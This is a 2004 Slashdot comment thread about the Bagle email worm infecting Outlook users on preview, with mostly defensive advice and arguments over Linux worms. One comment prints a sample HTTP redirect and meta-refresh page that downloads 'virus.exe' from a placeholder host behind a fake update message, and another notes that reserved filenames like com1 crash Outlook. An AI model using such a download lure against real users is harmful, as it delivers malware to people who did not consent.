  • by dtfinch ( 661405 ) * on Monday March 22, 2004 @02:42AM (#8632004) Journal
    If you refuse to use a mail client besides Outlook Express:
    1) Disable the preview pane. View messages by double clicking them. That way you're never forced to view a message you haven't made the decision to view, either by trying to delete it or by it being the top message in your inbox. This also helps to reduce spam, because spams with linked images can be used to verify that you read the email.
    2) Only view email you trust. For the rest, view the message source or ignore the message.
    3) The above will stop 99% or more of email viruses out there. To further reduce the risk, patching frequently and using a spam filter helps. Virus scanners like AVG also help but you can expect a noticeable slowdown in system response if you use one. I don't. No virus problems ever in 12 years.
  • stop using Outlook (Score:3, Informative)

    by msblack ( 191749 ) on Monday March 22, 2004 @02:44AM (#8632017)
    . . .reporting that the latest versions of the Beagle/Bagle virus can infect users' computers whether or not they open an attachment.

    Aparently they've never heard of e-mail software other than Outlook. Many e-mail programs do not execute the VBS code or other attachments of a message simply by selecting it from the Inbox.

  • Re:MacDailyNews? (Score:4, Informative)

    by dbirchall ( 191839 ) on Monday March 22, 2004 @02:46AM (#8632027) Journal
    Huge numbers of Macintosh users run Microsoft products (MSIE, Office v.X, Virtual PC, etc.). Some of us even run Windows under Virtual PC, and need to keep our Windows instances up to date security-wise. Last time I ran Windows Update on the Windows XP instance I have on my iBook, it came back with something like 35 things it needed to download. And I'm sure the same folks who let us know that a vulnerability doesn't affect our Macs would let us know if one did, too.

  • by mkettler ( 6309 ) on Monday March 22, 2004 @03:00AM (#8632086)
    ClamAV is a good step in the right direction, and it's incredibly great quality for freeware. I use it myself on my servers and it's wonderful. However, If you're looking to hit 100% of known viruses, clamav won't get you there.

    The current stable release of clamav doesn't support OLE2 scanning, thus can't catch viruses in many MS Office documents. (0.66-0.68 have OLE2 disabled).

    As far as why most ISPs aren't running clamav.. That's simple.. Load Average. Many ISPs are pushing their mailserver hardware pretty hard. As a result they don't have a lot of spare CPU onhand to do virus scanning.

    At the ISP level, CPU time isn't free, it costs because you need better more powerful servers to process the same volume of mail. Admittedly PC hardware is cheap for desktops, and low-end server-grade stuff isn't outrageous, it's still an added cost that can't be ignored. Scanning is going to easily double the amount of CPU time per message compared with just store and deliver, so you've just doubled the cost of your inbound MX hardware (assuming you're doing load balancing and can just double the number of servers).

    Sure it's money well spent, but it's not as inexpensive or free like it may seem at first glance.
  • by batura ( 651273 ) on Monday March 22, 2004 @03:14AM (#8632162)
    The inivisible-pixel-that-downloads-a-IE-vunerability trick is particularly good at defeating this level of security.

    I don't feel safe unless i'm reading my email through a CLI...
  • Re:Complete lie (Score:3, Informative)

    by geekoid ( 135745 ) <dadinportlandNO@SPAMyahoo.com> on Monday March 22, 2004 @03:16AM (#8632171) Homepage Journal
    did you read the study and what they where calling 'breached'?

    It was incredible.
    I don't care what OS they where testing, there test proved only one of two thing:
    1) they're catering to who paid them
    or
    2) they have no clue.

    Besides, the poster staement was about Apache, not Linux.
  • by Monkelectric ( 546685 ) <{slashdot} {at} {monkelectric.com}> on Monday March 22, 2004 @03:19AM (#8632191)
    You should filter reserved filenames as well, com1, com2, lpt1, etc. sending an attachment with any of these names will hose outlook (ask me how I found out :)
  • Re:.NET (Score:2, Informative)

    by agentofchange ( 640684 ) on Monday March 22, 2004 @03:58AM (#8632314)
    People will bitch about the fact that the .net CLR is so far abstracted that Windows now runs so slow its like using a crappy java app.

    Try this, use the .net draw functions then compare that to the win API in pait.

    For the fill function I'm counting 4 seconds for 320x240 and less than a second for the Win32API call.

  • RTFA people (Score:1, Informative)

    by Anonymous Coward on Monday March 22, 2004 @04:13AM (#8632359)
    If you've patched your Windows system, you're safe. This is a known exploit.
  • Re:Switch!!! (Score:4, Informative)

    by skinfitz ( 564041 ) on Monday March 22, 2004 @04:17AM (#8632370) Journal
    There has not been ONE single Linux virus that has propagted in the wild

    You mean apart from the Ramen Worm [com.com]?

    In fact wasn't that the first effective worm on the net? One that affected only Red Hat Linux systems?
  • Re:Simple... (Score:5, Informative)

    by GMC-jimmy ( 243376 ) on Monday March 22, 2004 @05:20AM (#8632515) Homepage
    Apparently, the simple act of selecting the message activates the code. Given that you have to select an E-mail to delete it, how are users supposed to protect themselves from this one?

    This has ALWAYS been the case when it comes to Outlook and Outlook Express. The Preview will execute the code contained within the mail message in exactly the same way as if you had opened it. It has been this way for a few years. This is what Valve's Half-Life 2 Lead programmer claims happened that lead to the leaked source code for HL2.
  • by Anonymous Coward on Monday March 22, 2004 @05:55AM (#8632584)
    I remember back in, oh, 1989 or so, asking about Excel macro security while working at Microsoft (product support, Operating Environments) - it had access to the entire Windows API so a malicious macro could easily reformat the hard drive or do anything else.

    Back then, the Internet was young, and the only way we knew of to make it spread was through BBSes (where we figured it would likely be caught quickly) so we didn't try to escalate it to the developers.

    Oops.

  • Solution (Score:5, Informative)

    by Idaho ( 12907 ) on Monday March 22, 2004 @06:14AM (#8632616)
    Given that you have to select an E-mail to delete it, how are users supposed to protect themselves from this one?

    From best solution to workaround:

    1. Don't use a Microsoft E-mail client
    2. Use a virus-scanner that catches it before it is opened
    3. You do not *have* to view an e-mail in order te delete it, if you close the preview pane you can delete it without viewing (even in Outlook Express). This is not exactly what I'd call convenient, though.
  • Re:Switch!!! (Score:4, Informative)

    by the_womble ( 580291 ) on Monday March 22, 2004 @06:24AM (#8632632) Homepage Journal
    Still not a lot compared with Windows.

    Even if viruses existed in line with market share you would expect 100s or thousands of linus viruses.

    Also the linked article does explain why Linux is an attractive target for virus writers: which supports point - that Windows viruses are not more prevelant purely, or even mainly, because it is more widely used.

  • Block tcp on port 81 (Score:4, Informative)

    by advocate_one ( 662832 ) on Monday March 22, 2004 @07:05AM (#8632749)
    breaks the vector and the virus can't pull it's payload in. [arnnet.com.au]

    Disallow connections to TCP port 81 through your network firewall. Blocking outbound port 81 connections stops computers on your network from downloading the worm from outside. Blocking inbound port 81 connections means that even if you do get infected you will not pass the virus on to others.
  • Re:Simple... (Score:5, Informative)

    by mosschops ( 413617 ) on Monday March 22, 2004 @07:18AM (#8632781)
    Don't use Microsoft products... or use them and have an up-to-date modern Anti Virus scanner.

    Don't forget that the Witty is entirely memory resident so most (if not all) virus scanners will miss it...
  • Re:Simple... (Score:2, Informative)

    by L0C0loco ( 320848 ) on Monday March 22, 2004 @08:14AM (#8632937) Homepage
    ... and that's why I use Eudora for email (where I can easily disable html email) and Opera as my default browser on my windows systems. Life can be so simple when you have a choice.
  • by jotaeleemeese ( 303437 ) on Monday March 22, 2004 @08:32AM (#8632979) Homepage Journal
    Try Knopix or any other of the several live CD distributions.

    Stop the excuses, you can try Linux today.
  • Re:Simple... (Score:2, Informative)

    by next1 ( 742094 ) on Monday March 22, 2004 @08:45AM (#8633016) Journal
    avg free edition [grisoft.com] might also be a good choice. i haven't actually tried it cos i don't run windows, but it looks good.

    i found this while looking for av software for my brother's pc, as he's recently had some virus problems. of course, i also got him using thunderbird and firefox ;-)
  • Re:Simple... (Score:2, Informative)

    by dustmite ( 667870 ) on Monday March 22, 2004 @09:05AM (#8633090)

    Well many of us unfortunately have to use Windows because (a) our work requires it and/or (b) more critically, our clients have Windows, and only know how to use Windows. So you have to develop your products for Windows if you actually want to sell anything :( :( ...

  • by mozzis ( 231162 ) on Monday March 22, 2004 @09:09AM (#8633112) Homepage
    I got tired of looking for the obivous answer so here it is with my apologies if it's already posted: Turn off preview pane in Outlook/OE. Then enjoy the best email client out there - no need to use a crippled program like Eudora.
  • Re:Simple... (Score:5, Informative)

    by AndroidCat ( 229562 ) on Monday March 22, 2004 @09:23AM (#8633201) Homepage
    And that's why I've always had the Preview pain switched off. And switched on View as Plain Text as soon as it was available. And use CTRL-F3 to view the "source" of email from people I don't know. If you have to use MS products, you've got to be on your toes because they are out to get you!
  • Re:Simple... (Score:2, Informative)

    by Cerpicio ( 691827 ) on Monday March 22, 2004 @09:46AM (#8633341)
    You can turn off the preview pane. I do that on all my mail browsers. But I wonder if this new virus is different, that it doesn't matter if you have preview on or not.

    -- C.
  • by Anonymous Coward on Monday March 22, 2004 @09:56AM (#8633406)
    Good idea on the 24 hour delay for email attachments being available to a client.

    But I think Fed Ex already beat you to the punch.

    I'm preaching to the choir, but the only system that I can see really 100%
    which \
    takes current user knowlege into account
    + will keep a network virus free
    + uses Windows
    + allows users to make mistakes
    = server-side scanning/stripping of attachments.

    That, or a new program which exposes email only via a web interface and only exposes mail as plain text.

    Any other scenario has rogue users who can make mistakes leading to a less than 100% solution and the appearance of virii on a network.
  • Re:Switch!!! (Score:2, Informative)

    by drrobin_ ( 131741 ) on Monday March 22, 2004 @09:56AM (#8633409)
    There has not been ONE single Linux virus that has propagted in the wild: given the huge nubmer of viruses out there I would have thought someone* would have written and released one for Linux just to show it can be done.
    Sorry buddy, but you are wrong. I was a crappy admin (back in my run-as-root-at-all-times days) and didn't patch a bind for an exploit in the redhat package. I got a worm which overwrote every copy of "index.html" with an infection notice, then which proceeded to scan for other hosts. It was the lion worm [about.com] that got me.

    Of course, it was my fault, for running an unpatched system. But I also have the perspective of the common user here: I did not know that a patch had been released
  • Re:Simple... (Score:2, Informative)

    by mad sQ SA ( 679212 ) on Monday March 22, 2004 @10:27AM (#8633651)
    It is very possible to have the newest AV updates and get hit by a virus.

    Thus the fundamental flaw of signature based protection. Cisco has a sweet little product out called Cisco Security Agent. Check it out. [cisco.com] My company is evaluating it now. It's a tad pricey, but it uses behavioral analysis to determine whether or not executed code is a worm, virus, or any other kind of malware. So there actually can be protection against unknown threats.
  • by Tokerat ( 150341 ) on Monday March 22, 2004 @10:36AM (#8633756) Journal

    Begin HTTP dump:
    Location: http://url.of.virus/virus.exe
    Content-type: text/html

    <html>
    <head>
    <meta http-equiv="refresh" content="3;URL=http://url.of.virus/virus.exe">
    </ head>
    <body>
    <h1>Please wait! Updating your computer for this website!</h1>
    </body>
    </html>
    That'll usually just about do it. I've seen it before with the AIM viruses which have been common lately. It's actually a bit funny when it happens on a MacOS 9 machine :-)

    ActiveX controls I'm told are actually a great way to make this happen automatically and without notice (erm, on Windows), but I have no idea about the actual method.
  • Bah (Score:3, Informative)

    by JMZero ( 449047 ) on Monday March 22, 2004 @11:16AM (#8634209) Homepage
    Almost all of the viruses from the last few years have been "open attachment to get infected" types. That this one isn't that way is fairly big news.

    The Preview will execute the code contained within the mail message in exactly the same way as if you had opened it. It has been this way for a few years

    What does that even mean? Execute the code? Do you mean "render the HTML"? Outlook Express doesn't execute script in the preview window or the "opened message" window. I'm guessing this new virus either forces script to execute via some exploit, performs an exploit in general HTML rendering, or performs some exploit against ActiveX. The important distinction here has never been between "previewing the e-mail" and "opening the e-mail", it's been between "looking at the e-mail" and "opening the attachments".

A morsel of genuine history is a thing so rare as to be always valuable. -- Thomas Jefferson

Working...